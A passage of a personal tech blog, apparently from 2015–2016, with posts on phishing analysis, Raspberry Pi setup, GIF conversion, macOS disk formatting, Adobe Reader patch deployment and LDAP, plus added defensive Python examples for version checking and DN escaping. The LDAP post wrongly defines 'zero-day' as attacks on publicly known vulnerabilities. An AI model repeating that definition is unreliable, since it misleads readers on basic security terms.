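The form action is the most useful single fact in the report: it is where the credentials would be sent, which the redirect chain alone does not reveal.</div>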
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxWZYDhyphenhyphenPPZYSd3z67hWBuXlyjSltDFT6gxhWtpdcvZISEyLJzjiJRVJtbnXhhojqnlYJ5nUvbOgVam-pUiVB8ZdBXT1E_kMsysLi_luGZHUD4QZj136jKRRuxzQ79vMbLd2xm9o8ODv1n/s1600/Screen+Shot+2016-02-12+at+2.45.50+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxWZYDhyphenhyphenPPZYSd3z67hWBuXlyjSltDFT6gxhWtpdcvZISEyLJzjiJRVJtbnXhhojqnlYJ5nUvbOgVam-pUiVB8ZdBXT1E_kMsysLi_luGZHUD4QZj136jKRRuxzQ79vMbLd2xm9o8ODv1n/s640/Screen+Shot+2016-02-12+at+2.45.50+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
To find out who the attacker is, we could decode everything on the site, or monitor the packets in transit between my laptop and any external services. However, I am not going into this now, and may continue this work another day.</div>
<div>
<br /></div>
<h3>
Sum Up</h3>
<div>
Spam doesn't do any harm if you understand what's going on. From this case, we can learn that we should:</div>
<div>
<ul>
<li>check the sender's domain</li>
<li>open suspicious URL in Tor Browser</li>
<li>beware of the URL</li>
<li>mark spam in your Gmail when you find it, which helps Google stop it from spreading to other people</li>
</ul>
</div>
<div><b>Setting Up Raspberry Pi</b> - Heron Yang, 2015-12-13</div>
<h3>
Preface</h3>
Cool, I've tried Arduino, BeagleBone, and STM boards before, but this is my first experience coding on a Raspberry Pi, which is quite famous and cheap as well. In this post, I will write down my steps for setting up Raspbian, a Linux distribution designed for the Raspberry Pi. Although there are already tons of tutorials on this, I will include some troubleshooting as well.<br />
<br />
<h3>
Equipment</h3>
<ol>
<li>Raspberry Pi Model B</li>
<li>HDMI Cable</li>
<li>Monitor that supports HDMI</li>
<li>MicroSD Card (at least 8G)</li>
<li>USB Keyboard / USB Mouse</li>
<li>USB wireless adapter - Edimax EW-7811UN</li>
<li>USB Cable (A type to Micro)</li>
</ol>
<div>
<br /></div>
<h3>
Steps</h3>
<h4>
Build OS Image on SD Card</h4>
<div>
Normally, this step should be easy: only one or two commands are needed to get an SD card with our OS on it. However, I ran into a problem while doing this step this time: my SD card was in read-only mode. Usually, this is caused by the physical lock switch on the card; however, no matter whether I switched it on or off, it was always locked. Using the commands I noted in the <a href="http://heron-note.blogspot.tw/2015/10/usb-formatting-to-support-windows-using.html">last post</a>, we can see its details:</div>
<blockquote>
<b>> diskutil info disk2</b><br />
Device Identifier: disk2<br />
Device Node: /dev/disk2<br />
Whole: Yes<br />
Part of Whole: disk2<br />
Device / Media Name: SD Card Reader<br />
Volume Name: Not applicable (no file system)<br />
Mounted: Not applicable (no file system)<br />
File System: None<br />
Content (IOContent): FDisk_partition_scheme<br />
OS Can Be Installed: No<br />
Media Type: Generic<br />
Protocol: USB<br />
SMART Status: Not Supported<br />
Total Size: 15.9 GB (15931539456 Bytes) (exactly 31116288 512-Byte-Units)<br />
Volume Free Space: Not applicable (no file system)<br />
Device Block Size: 512 Bytes<br />
Read-Only Media: Yes<br />
Read-Only Volume: Not applicable (no file system)<br />
Device Location: Internal<br />
Removable Media: Yes<br />
Media Removal: Software-Activated<br />
Virtual: No<br />
OS 9 Drivers: No<br />
Low Level Format: Not supported</blockquote>
<br />
And, whenever I tried to format or write onto the card, I got:<br />
<br />
<blockquote class="tr_bq">
<b>> sudo -s -- 'dd bs=1m if=/dev/zero of=/dev/disk2'</b><br />
Password:<br />
dd: /dev/disk2: Permission denied</blockquote>
<br />
After several trials and some Googling, I found the problem was caused by the adapter that converts the small Micro SD card to the normal size: its lock switch wasn't functioning well. Funny discussions of this issue can be found online, such as <a href="https://www.raspberrypi.org/forums/viewtopic.php?f=91&t=104006">"it worked when it was about 75% towards the unlocked position, but you might need to fiddle with it a bit"</a>. No matter how I placed the lock switch, it never worked.<br />
<br />
So I then bought a small Micro SD card reader, which costs around USD 2.5, and it fixed the problem nicely.<br />
<br />
<blockquote class="tr_bq">
<b>> diskutil info disk3</b><br />
Device Identifier: disk3<br />
Device Node: /dev/disk3<br />
Whole: Yes<br />
Part of Whole: disk3<br />
Device / Media Name: STORAGE DEVICE<br />
Volume Name: Not applicable (no file system)<br />
Mounted: Not applicable (no file system)<br />
File System: None<br />
Content (IOContent): FDisk_partition_scheme<br />
OS Can Be Installed: No<br />
Media Type: Generic<br />
Protocol: USB<br />
SMART Status: Not Supported<br />
Total Size: 15.9 GB (15931539456 Bytes) (exactly 31116288 512-Byte-Units)<br />
Volume Free Space: Not applicable (no file system)<br />
Device Block Size: 512 Bytes<br />
Read-Only Media: No<br />
Read-Only Volume: Not applicable (no file system)<br />
Device Location: External<br />
Removable Media: Yes<br />
Media Removal: Software-Activated<br />
Virtual: No<br />
OS 9 Drivers: No<br />
Low Level Format: Not supported<br />
~<br />
<b>> diskutil unmountDisk /dev/disk3</b><br />
Unmount of all volumes on disk3 was successful<br />
~<br />
<b>> sudo -s -- 'dd bs=1m if=/Users/heron/Desktop/2015-11-21-raspbian-jessie-lite.img | pv | dd of=/dev/disk3'</b></blockquote>
I put pv in the middle rather than using dd alone because dd doesn't show a progress bar, so it's hard to know how long it will take and how much is done.<br />
<h4>
Power Up</h4>
<div>
Basically, the following steps are easy and we are almost finished. Plug in the cables as shown below; the board powers up as soon as the micro USB is plugged in.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfm81kod63gTsKro7bopRBpcUckh8jC6kMKlBvN_yRyibf7vK99CgGVJmzIydqzNazKV6ydn5Pu0mpUrF4cJAUvbzsRKPsXDniFrz8MAR5OKE6i-PBEc0ueFb3KoMJARgJFMStsboq147O/s1600/IMG_20151213_105718.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfm81kod63gTsKro7bopRBpcUckh8jC6kMKlBvN_yRyibf7vK99CgGVJmzIydqzNazKV6ydn5Pu0mpUrF4cJAUvbzsRKPsXDniFrz8MAR5OKE6i-PBEc0ueFb3KoMJARgJFMStsboq147O/s640/IMG_20151213_105718.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
From the photo, one can see that I have:</div>
<div>
<ul>
<li>1 Micro USB for power</li>
<li>1 HDMI for display</li>
<li>2 Logitech Unifying Receivers for keyboard and mouse</li>
<li>1 USB wireless adapter for Wifi</li>
<li>1 USB microphone (for application purpose)</li>
</ul>
<h4>
Keyboard Layout Issue</h4>
</div>
<div>
Everything should be set so far, and if you're using the <a href="https://www.raspberrypi.org/downloads/noobs/">NOOBS system installer</a>, it will do the rest of the job. The only thing you have to do is select your settings and the system you wish to install.</div>
<div>
<br /></div>
<div>
However, there's one issue I found right after setting up Raspbian, the Debian-based operating system designed for the Raspberry Pi. It uses a different keyboard layout from the general one I am used to. So, to fix the problem, we have to fire up keyboard-configuration and pick the right setting. The steps are in <a href="http://thepihut.com/blogs/raspberry-pi-tutorials/25556740-changing-the-raspberry-pi-keyboard-layout">this link</a>. The settings take effect only after a reboot.<br />
<br /></div>
<h3>
Reference</h3>
<ul>
<li><a href="https://www.raspberrypi.org/forums/viewtopic.php?f=91&t=104006">Mac SD card creation problem, Error: -69877: (solved)</a></li>
<li><a href="http://thepihut.com/blogs/raspberry-pi-tutorials/25556740-changing-the-raspberry-pi-keyboard-layout">Changing the Raspberry Pi Keyboard Layout</a></li>
</ul>
<div><b>Convert GIF Background from Transparency to a Solid Color</b> - Heron Yang, 2015-12-12</div>
<h3>
Preface</h3>
The other day, I got a new Pebble watch, and I started to code something on it. Within one day, I had tried out its dictation API with a small but fun app. I also wrote a watchface with a circular progress bar showing the percentage of today's time that has passed (the idea is from one of the Apple Watch watchfaces, <a href="http://www.apple.com/watch/watch-reimagined/">"Solar"</a>).<br />
<br />
However, when I tried to put an animation on my watchface, it required an "Animated Portable Network Graphics (APNG) file format" with a solid color background. Therefore, I had to find a way to convert a GIF file I have into that format, even though my GIF file has a transparent background.<br />
<br />
<h3>
Steps</h3>
<div>
ImageMagick's "convert" is a powerful tool in this situation; I've been using it since the first year I started using Unix-like systems. To install it (on Mac, via MacPorts):</div>
<blockquote class="tr_bq">
<b>> sudo port install ImageMagick</b></blockquote>
<div>
To fill in a solid background (black here) on my GIF file:</div>
<blockquote class="tr_bq">
<b>> convert input.gif -background black -alpha remove result.gif</b></blockquote>
where the background option sets the background color, and the alpha option is set to "remove" to remove its transparency.<br />
<br />
And to convert the GIF file into an APNG file, we can use a tool called gif2apng, which can be downloaded <a href="http://gif2apng.sourceforge.net/">here</a>. How I use it is shown below:<br />
<blockquote class="tr_bq">
<b>> unzip gif2apng-1.9-bin-macosx.zip</b><br />
<b>> cp gif2apng ~/bin</b><br />
<b>> export PATH=~/bin:$PATH</b> # this depends on the setting you prefer, I like to put this kind of tool under ~/bin<br />
<b>> gif2apng result.gif result.png</b><br />
<br />
gif2apng 1.9 using 7ZIP with 15 iterations<br />
<br />
Reading 'result.gif'...<br />
9 frames.<br />
Writing 'result.png'...<br />
9 frames.</blockquote>
<div>
<h3>
More</h3>
One more step to go in order to fit the Pebble watch, which may be a little irrelevant to this post: I have to crop the image since it's too big, and what I wanted was to remove the upper part. It's originally 100 * 120, and I would like it to become 100 * 100. So, here's the magic:<br />
<blockquote class="tr_bq">
<b>> convert input.gif -coalesce -repage 0x0 -crop 100x100+0+20 +repage result.gif</b></blockquote>
Finally, we can combine everything as below:<br />
<blockquote class="tr_bq">
<b>> convert input.gif -coalesce -repage 0x0 -crop 100x100+0+20 +repage -background black -alpha remove result.gif; gif2apng result.gif input.png</b></blockquote>
</div>
<div><b>USB Formatting to Support Windows using Mac Command Line Tool</b> - Heron Yang, 2015-10-11</div>
<h3 class="tr_bq">
Abstract</h3>
It's an annoying problem that Windows doesn't support many filesystem formats; thus, we usually run into problems when we plug a USB flash disk that was formatted on a Mac into a Windows machine. Although it seems that this can be solved easily by reformatting the disk to FAT or exFAT, other problems still exist, such as different versions of Windows supporting different types of filesystem.<br />
<br />
Anyway, I am writing this post to record how I solved this problem efficiently, so it may help someone or myself in the future.<br />
<br />
<h3>
Steps</h3>
<h4>
A. Locate disk identifier</h4>
<blockquote class="tr_bq">
<b>> diskutil list</b><br />...<br />/dev/disk4 (external, physical):<br /> #: TYPE NAME SIZE IDENTIFIER<br /> 0: FDisk_partition_scheme *8.0 GB disk4<br /> 1: DOS_FAT_32 HERON 8.0 GB disk4s1</blockquote>
<h4>
B. Check Status</h4>
If you want to read the information about the disk:<br />
<blockquote>
<b>> diskutil info <u><i>disk4</i></u></b><br /> Device Identifier: disk4<br /> Device Node: /dev/disk4<br /> Whole: Yes<br /> Part of Whole: disk4<br /> Device / Media Name: SanDisk Cruzer Fit Media<br /> Volume Name: Not applicable (no file system)<br /> Mounted: Not applicable (no file system)<br /> File System: None<br /> Content (IOContent): FDisk_partition_scheme<br /> OS Can Be Installed: No<br /> Media Type: Generic<br /> Protocol: USB<br /> SMART Status: Not Supported<br /> Total Size: 8.0 GB (8004304896 Bytes) (exactly 15633408 512-Byte-Units)<br /> Volume Free Space: Not applicable (no file system)<br /> Device Block Size: 512 Bytes<br /> Read-Only Media: No<br /> Read-Only Volume: Not applicable (no file system)<br /> Device Location: External<br /> Removable Media: Yes<br /> Media Removal: Software-Activated<br /> Virtual: No<br /> OS 9 Drivers: No<br /> Low Level Format: Not supported</blockquote>
<h4>
C. Verify Volumes</h4>
If you want to verify whether there's any issue with the current disk:<br />
<blockquote class="tr_bq">
<b>> diskutil verifyVolume /Volumes/<u><i>HERON</i></u></b><br />Started file system verification on disk4s1 HERON<br />Verifying file system<br />** /dev/rdisk4s1<br />** Phase 1 - Preparing FAT<br />** Phase 2 - Checking Directories<br />** Phase 3 - Checking for Orphan Clusters<br />79 files, 7800596 KiB free (1950149 clusters)<br />File system check exit code is 0<br />Finished file system verification on disk4s1 HERON</blockquote>
<h4>
D. Repairing Volumes</h4>
If you found a problem and want to repair the disk:<br />
<blockquote class="tr_bq">
<b>> diskutil repairVolume /Volumes/HERON</b><br />Started file system repair on disk4s1 HERON<br />Repairing file system<br />** /dev/rdisk4s1<br />** Phase 1 - Preparing FAT<br />** Phase 2 - Checking Directories<br />** Phase 3 - Checking for Orphan Clusters<br />77 files, 7800608 KiB free (1950152 clusters)<br />File system check exit code is 0<br />Updating boot support partitions for the volume as required<br />Finished file system repair on disk4s1 HERON</blockquote>
<h4>
E. Format</h4>
To format the disk in order to support Windows' FAT:<br />
<blockquote class="tr_bq">
<b>> diskutil eraseDisk MS-DOS HERON_2 /dev/disk4</b><br />Started erase on disk4<br />Unmounting disk<br />Creating the partition map<br />Waiting for the disks to reappear<br />Formatting disk4s2 as MS-DOS (FAT) with name HERON_2<br />512 bytes per physical sector<br />/dev/rdisk4s2: 15191032 sectors in 1898879 FAT32 clusters (4096 bytes/cluster)<br />bps=512 spc=8 res=32 nft=2 mid=0xf8 spt=32 hds=255 hid=411648 drv=0x80 bsec=15220736 bspf=14836 rdcl=2 infs=1 bkbs=6<br />Mounting disk<br />Finished erase on disk4</blockquote>
To list the filesystems supported by diskutil:<br />
<blockquote class="tr_bq">
<b>> diskutil listFilesystems</b><br />Formattable file systems<br />These file system personalities can be used for erasing and partitioning.<br />When specifying a personality as a parameter to a verb, case is not considered.<br />Certain common aliases (also case-insensitive) are listed below as well.<br />-------------------------------------------------------------------------------<br />PERSONALITY USER VISIBLE NAME<br />-------------------------------------------------------------------------------<br />ExFAT ExFAT<br />Free Space Free Space<br /> (or) free<br />MS-DOS MS-DOS (FAT)<br />MS-DOS FAT12 MS-DOS (FAT12)<br />MS-DOS FAT16 MS-DOS (FAT16)<br />MS-DOS FAT32 MS-DOS (FAT32)<br /> (or) fat32<br />HFS+ Mac OS Extended<br />Case-sensitive HFS+ Mac OS Extended (Case-sensitive)<br /> (or) hfsx<br />Case-sensitive Journaled HFS+ Mac OS Extended (Case-sensitive, Journaled)<br /> (or) jhfsx<br />Journaled HFS+ Mac OS Extended (Journaled)<br /> (or) jhfs+</blockquote>
If you are using the GUI Disk Utility, make sure you pick "Master Boot Record":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEy4bHgwhvg9AlL7N1xWb2jl3CTeQPVb_zCvmiz975pYVx1N1ytwdyoAMItYF3a0fcujfW_H_7MjmIR2K6Nt1bZn-SUKt1DDsd7nOCzIjoLCnpVszs-Y6zlPseArvsQnrgNA1-2IIGJGx1/s1600/Screen+Shot+2015-10-11+at+5.34.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEy4bHgwhvg9AlL7N1xWb2jl3CTeQPVb_zCvmiz975pYVx1N1ytwdyoAMItYF3a0fcujfW_H_7MjmIR2K6Nt1bZn-SUKt1DDsd7nOCzIjoLCnpVszs-Y6zlPseArvsQnrgNA1-2IIGJGx1/s640/Screen+Shot+2015-10-11+at+5.34.00+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In case you get an "unable to unmount volume" error, make sure your shell's current directory is not inside the volume when diskutil tries to unmount it:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<blockquote class="tr_bq" style="clear: both;">
<i>/Volumes/HERON_2</i><br /><b>> diskutil verifyVolume /Volumes/HERON</b><br />Unable to find disk for /Volumes/HERON<br /><i>/Volumes/HERON_2</i><br /><b>> diskutil verifyVolume /Volumes/HERON_2</b><br />Started file system verification on disk4s2 HERON_2<br />Error: -69673: Unable to unmount volume for repair<br /><i>/Volumes/HERON_2</i><br /><b>> diskutil verifyVolume /Volumes/HERON_2</b><br /><i>/Volumes/HERON_2</i><br /><b>> cd ..</b><br /><i>/Volumes</i><br /><b>> diskutil verifyVolume /Volumes/HERON_2</b><br />Started file system verification on disk4s2 HERON_2<br />Verifying file system<br />** /dev/rdisk4s2<br />** Phase 1 - Preparing FAT<br />** Phase 2 - Checking Directories<br />** Phase 3 - Checking for Orphan Clusters<br />83 files, 7594648 KiB free (1898662 clusters)<br />File system check exit code is 0<br />Finished file system verification on disk4s2 HERON_2</blockquote>
<h3>
Reference</h3>
<div>
<ul>
<li><a href="http://www.theinstructional.com/guides/disk-management-from-the-command-line-part-1">Disk Management From the Command-Line, Part 1</a></li>
<li><a href="http://coolestguidesontheplanet.com/format-usb-external-disk-mac-osx-using-disk-utility/">How to format a USB external disk for Mac OSX using Disk Utility</a></li>
</ul>
</div>
<div><b>Adobe Reader DC Update - Network Security Importance</b> - Heron Yang, 2015-09-04</div>
<h3>
Preface</h3>
Today, people in MOI put quite a lot of effort into updating Adobe Reader DC to the latest version. In this post, I would like to discuss the importance of updating software like this from a security viewpoint, as well as the methods we can apply to update software on a bunch of computers efficiently.<br />
<br />
<h3>
Adobe Reader DC Update - Introduction</h3>
<div>
To discuss the importance of the update, we first have to find out what's new in <a href="http://www.adobe.com/devnet-docs/acrobatetk/tools/ReleaseNotes/DC/dccontinuousjuly2015.html">the latest update</a> (taking the 15.008.20082 planned update as the example here). Then we look into the security part (ignoring the new features, bugs, etc.), and take version 2015.007.20033 as the affected version, for which we can get a list of <a href="https://helpx.adobe.com/security/products/acrobat/apsb15-15.html">CVE numbers</a>.</div>
<div>
<br /></div>
<div>
Adobe lists all the security issues (Common Vulnerabilities and Exposures, CVE) that affect certain versions of their Reader DC software, which look like: CVE-2014-0566, CVE-2014-8450, CVE-2015-3095, CVE-2015-4435, CVE-2015-4438, CVE-2015-4441, CVE-2015-4443, ... etc.</div>
<div>
<br /></div>
<div>
Each CVE identifies one security problem. For example, CVE-2014-0566 is a memory corruption vulnerability that could lead to code execution, CVE-2014-8450 is a security bypass vulnerability that could lead to information disclosure, etc. Any of these CVEs may be a huge security issue that could let attackers execute programs without permission.</div>
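<div>
Knowing the affected and fixed versions, the practical question for an IT administrator is which machines still run an affected build. The following is an added Python example, not from the original post or from Adobe: it normalises the two version spellings used above (15.008.20082 and 2015.007.20033) into comparable tuples and checks a constructed inventory. Treating the four-digit year and the two-digit form as the same release is an assumption made here, and the hostnames and the version 15.007.20012 in the inventory are made up.</div>

```python
import re

# Versions quoted in the post: the release that ships the fixes and the last
# affected release. Adobe writes the same release both as "15.008.20082" and
# "2015.008.20082"; treating the four-digit year and its two-digit form as equal
# is an assumption made here.
FIXED_VERSION = "15.008.20082"
AFFECTED_UPTO = "2015.007.20033"


def parse_version(v):
    """Turn '2015.007.20033' or '15.007.20033' into a comparable tuple (15, 7, 20033)."""
    parts = v.strip().split(".")
    if len(parts) != 3 or not all(re.fullmatch(r"\d+", p) for p in parts):
        raise ValueError(f"unrecognised Reader DC version: {v!r}")
    major, minor, build = (int(p) for p in parts)
    if major >= 2000:            # "2015" -> 15 (assumption noted above)
        major -= 2000
    return (major, minor, build)


def needs_update(installed, fixed=FIXED_VERSION):
    """True when the installed build is older than the release that ships the fixes."""
    return parse_version(installed) < parse_version(fixed)


# Constructed inventory, shaped like a software-inventory export: (hostname, version).
INVENTORY = [
    ("ws-101", "15.007.20033"),
    ("ws-102", "2015.007.20033"),
    ("ws-103", "15.008.20082"),
    ("ws-104", "15.007.20012"),
    ("ws-105", "not installed"),
]


def hosts_needing_update(inventory, fixed=FIXED_VERSION):
    """Return (outdated_hosts, unparsable_hosts) for an inventory of (host, version) pairs."""
    outdated, unknown = [], []
    for host, version in inventory:
        try:
            if needs_update(version, fixed):
                outdated.append(host)
        except ValueError:
            unknown.append(host)
    return outdated, unknown
```

<div>
Entries that do not parse are reported rather than silently skipped, since a host with no readable version is exactly the one an administrator needs to look at. The comparison is only meaningful among machines on the same Reader DC release track.</div>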
<div>
<br /></div>
<h3>
Adobe Reader DC Update - Methods</h3>
<div>
For sure, the most basic solution is to click "Check for Updates" in Adobe Reader. However, here I would like to discuss the methods used by IT administrators, which apply updates to multiple computers at the same time. (Although I am not familiar enough with Windows, I am discussing things in a Windows environment since that's the environment I have been facing recently.)</div>
<h4>
Method 1 - AIP-GPO</h4>
<div>
AIP-GPO stands for Administrative Install Point deployed via Group Policy Objects, so it should be discussed in two parts.</div>
<div>
<br /></div>
<div>
An <u>AIP</u> is a special directory created by extracting the contents of a self-contained MSI file into a previously empty directory with the command 'msiexec /a' (the administrative installation option). For msp patch files, you then run 'msiexec /p' to apply the patch onto the MSI you just extracted.</div>
<div>
<br /></div>
<div>
<u>GPOs</u> are used to distribute settings from a Windows server to Windows PCs that are members of a domain. After the initial GPO setup, you can simply select the AIP folder and apply the change. Users under the GPO policy will then get the latest update after the group policy refreshes and the computer restarts.</div>
<div>
<br /></div>
<div>
* Without real hands-on experience with AIP-GPO, I am not sure how GPO finds AIP folders, or how good this solution is.</div>
<h4>
Method 2 - Bootstrapper</h4>
<div>
Any setup.exe or other executable that installs updates and launches the MSI installer is a Bootstrapper. From Adobe's documentation, we can learn the following benefits of using a Bootstrapper:</div>
<div>
<ul>
<li>Detects whether the required Windows Installer (MSI) is available and installs it if it isn’t.</li>
<li>Detects whether the product is already installed and only proceeds if it does not exist on the target machine.</li>
<li>Provides binary installations where the entire installer is supplied and run by each machine.</li>
<li>Provides a simple way to chain updates in the required order by simply adding the msp to the installer folder and modifying Setup.ini to apply that patch.</li>
<li>It is not subject to the patch constraint that limits an AIP from installing a quarterly update over an out-of-cycle patch. Thus, installs can always have the latest update without starting over.</li>
</ul>
</div>
<div>
So, for our purpose, we can simply add the msp file to the installer folder and modify Setup.ini to apply the latest Adobe Reader update.</div>
<div>
<br /></div>
<div>
* Without enough information, I am not sure how this solution applies to multiple machines at the same time. So far, I assume the bootstrapper is a way to install/manage updates via the command line; therefore, I think that to distribute the updates to multiple machines, we have to distribute the msp file first, then run setup.exe on each machine remotely.</div>
<h4>
Method 3 - SCUP/SCCM</h4>
<div>
"System Center Updates Publisher (SCUP) is a stand-alone tool that is used in conjunction with Microsoft’s System Center Configuration Manager (CM hereafter) to allow administrators to more accurately and efficiently install and update software. Together, CM and SCUP are Microsoft’s latest change and configuration management solution that replaces older methodologies such as SMS and GPO. Unlike those technologies, CM provides features such as metering, asset intelligence, and improved remote client administration. For example, CM users can easily determine what products versions are installed including all dot and double dot patches without having to write a complicated query." - Adobe.com</div>
<div>
<br /></div>
<div>
Simply put, SCUP/SCCM is a newer solution that came after the previous two. SCUP is a catalog file, and CM is the way to publish/manage the updates. However, since it's a newer solution, it only works with 10.x and later Adobe products.</div>
<br /><h3>
Summary</h3>
<div>
From the documentation and the software updates, we can see that Adobe takes security issues seriously. They publish patches to deal with known CVEs, and offer several methods to help IT administrators or individuals update. However, without knowing the real challenges that MOI has, it's quite funny that we were doing the updates manually by visiting every user at their seat.</div>
<br /><h3>
Reference</h3>
<div>
<ul>
<li><a href="http://www.klaus-hartnegg.de/gpo/aip.html">Administrative Installation Point (AIP)</a></li>
<li><a href="http://www.klaus-hartnegg.de/gpo/gpo.html">GPO</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/cc759262(v=ws.10).aspx">Msiexec (command-line options)</a></li>
<li><a href="https://community.spiceworks.com/how_to/479-creating-an-administrative-install-point-for-adobe-reader-to-deploy-via-gpo">Creating an Administrative Install Point for Adobe Reader (To deploy via GPO)</a></li>
<li><a href="http://www.adobe.com/devnet-docs/acrobatetk/tools/AdminGuide/gpo.html">Group Policy-Active Directory</a></li>
<li><a href="http://www.adobe.com/devnet-docs/acrobatetk/tools/AdminGuide/bootstrapper.html">Bootstrapper Deployment</a></li>
<li><a href="http://www.adobe.com/devnet-docs/acrobatetk/tools/AdminGuide/sccm.html">SCCM-SCUP</a></li>
</ul>
</div>
<div>
<br /></div>
<div><b>Lightweight Directory Access Protocol (LDAP) & Active Directory (AD)</b> - Heron Yang, 2015-09-02</div>
<h3>
Preface</h3>
From a security standpoint, it's better to keep your software updated all the time, since old versions may have known security problems. There's a common name for this kind of hacking: "zero-day". Here's how it works: a hacker first scans the versions of the software you are using, and if he/she finds that you're using an older version, he/she goes looking for any known security problem in that version. This is called zero-day since, once the vulnerability is released to the public, people have zero days to fix the problem while all the machines are under threat.<br />
<br />
So, to reduce the threat, we keep our software updated. However, since there may be tons of computers in one organization, there should be solutions on different platforms to update all the computers correctly, remotely, and efficiently.<br />
<br />
<h3>
Lightweight Directory Access Protocol (LDAP)</h3>
<h4>
Short Description</h4>
"LDAP is a directory service protocol that runs on a layer above the TCP/IP stack. It provides a mechanism used to connect to, search, and modify Internet directories. It's based on a client-server model." - MSDN<br />
<br />
<h4>
Information Model (data and namespaces)</h4>
It's similar to that of the X.500 OSI directory service, but with fewer features and lower resource requirements than X.500.<br />
<br />
<h4>
API</h4>
<br />
<ul>
<li>initialize a session (ldap_init, ldap_sslinit)</li>
<li>bind to the server (ldap_connect)</li>
<li>modify a directory entry, etc.</li>
</ul>
<div>
<br /></div>
<h4>
Distinguished Name (DN)</h4>
<div>
A DN is a sequence of relative distinguished names (RDN) connected by commas. Typical RDNs are as below:</div>
<div>
<ul>
<li>DC: domainComponent</li>
<li>CN: commonName</li>
<li>OU: organizationalUnitName</li>
<li>O: organizationName</li>
<li>STREET: streetAddress</li>
<li>L: localityName</li>
<li>ST: stateOrProvinceName</li>
<li>C: countryName</li>
<li>UID: userid</li>
</ul>
<div>
So, it looks like: <b>CN=Jeff Smith,OU=Sales,DC=Fabrikam,DC=COM</b></div>
</div>
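<div>
Because commas and equals signs are structural in a DN, a DN built by string concatenation from a user-supplied value can end up with extra RDNs. The following is an added Python example (not from the MSDN page or the original post) that parses a DN into its RDNs following RFC 4514 escaping rules and escapes values when building one; the DN from the post is used as the sample, the second sample DN and the helper names are my own.</div>

```python
import re

# Characters that must be escaped inside a DN attribute value (RFC 4514, section 2.4).
# '=' is allowed unescaped in values, but escaping it is permitted and keeps a value
# containing "OU=..." from looking like an RDN.
_SPECIAL = set(',+"\\<>;=')


def escape_dn_value(value):
    """Escape one attribute value so it can be embedded in a DN without changing its structure."""
    out = []
    last = len(value) - 1
    for i, ch in enumerate(value):
        if ch in _SPECIAL:
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\00")
        elif ch == "#" and i == 0:                  # a leading '#' would start a hex-encoded value
            out.append("\\#")
        elif ch == " " and (i == 0 or i == last):   # leading/trailing spaces would otherwise be trimmed
            out.append("\\ ")
        else:
            out.append(ch)
    return "".join(out)


def _split_unescaped(s, sep):
    """Split s on sep, ignoring occurrences preceded by a backslash."""
    parts, cur, i = [], [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            cur.append(s[i:i + 2])
            i += 2
        elif s[i] == sep:
            parts.append("".join(cur))
            cur = []
            i += 1
        else:
            cur.append(s[i])
            i += 1
    parts.append("".join(cur))
    return parts


def _unescape(value):
    """Undo RFC 4514 escaping: '\\,' -> ',' and '\\2c' -> ',' (hex pairs are taken as single bytes)."""
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            pair = value[i + 1:i + 3]
            if re.fullmatch(r"[0-9A-Fa-f]{2}", pair):
                out.append(chr(int(pair, 16)))
                i += 3
                continue
            out.append(value[i + 1])
            i += 2
            continue
        out.append(value[i])
        i += 1
    return "".join(out)


def _strip_unescaped_spaces(s):
    """Strip surrounding spaces, keeping an escaped trailing '\\ '."""
    s = s.lstrip(" ")
    while s.endswith(" ") and not s.endswith("\\ "):
        s = s[:-1]
    return s


def parse_dn(dn):
    """Parse a DN into [(attribute_type, value), ...], most specific RDN first.

    Multi-valued RDNs joined with '+' are kept as one value string.
    """
    if not dn.strip():
        return []
    rdns = []
    for rdn in _split_unescaped(dn, ","):
        attr, sep, value = rdn.partition("=")       # attribute types never contain '='
        if not sep or not attr.strip():
            raise ValueError(f"malformed RDN: {rdn!r}")
        rdns.append((attr.strip(), _unescape(_strip_unescaped_spaces(value))))
    return rdns


def build_dn(rdns):
    """Build a DN from (attribute_type, value) pairs, escaping every value."""
    return ",".join(f"{attr}={escape_dn_value(value)}" for attr, value in rdns)


# The DN from the post, and a constructed one whose CN itself contains a comma.
EXAMPLE_DN = "CN=Jeff Smith,OU=Sales,DC=Fabrikam,DC=COM"
ESCAPED_DN = "CN=Smith\\, Jeff,OU=Sales,DC=Fabrikam,DC=COM"
```

<div>
Splitting the second DN on plain commas gives five pieces while the parser gives four RDNs, and a CN such as "Jeff,OU=Admins" round-trips through build_dn and parse_dn as a single value instead of turning into an extra OU, which is the property to insist on wherever a DN is assembled from input.</div>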
<div>
<br /></div>
<h3>
Active Directory (AD)</h3>
<br />
"Active Directory is a directory service that Microsoft developed for <u>Windows domain networks</u> and is included in most <u>Windows Server</u> operating systems. An AD domain controller authenticates and authorizes all the users and computers in a Windows domain type network - <u>assigning and enforcing security policies for all computers and installing or updating software</u>. It makes use of LDAP version 2 and 3, Microsoft's version of Kerberos, and DNS" - Wikipedia<br />
<br />
To simplify, AD is Microsoft's LDAP solution, designed for the Windows environment. And yes, its domain design is much more complicated.<br />
<br />
<h3>
Reference</h3>
<br />
<ul>
<li><a href="https://msdn.microsoft.com/en-us/library/aa367008(v=vs.85).aspx">Lightweight Directory Access Protocol - MSDN</a></li>
<li><a href="https://en.wikipedia.org/wiki/Active_Directory">Active Directory - Wiki</a></li>
</ul>
<br />
<br />
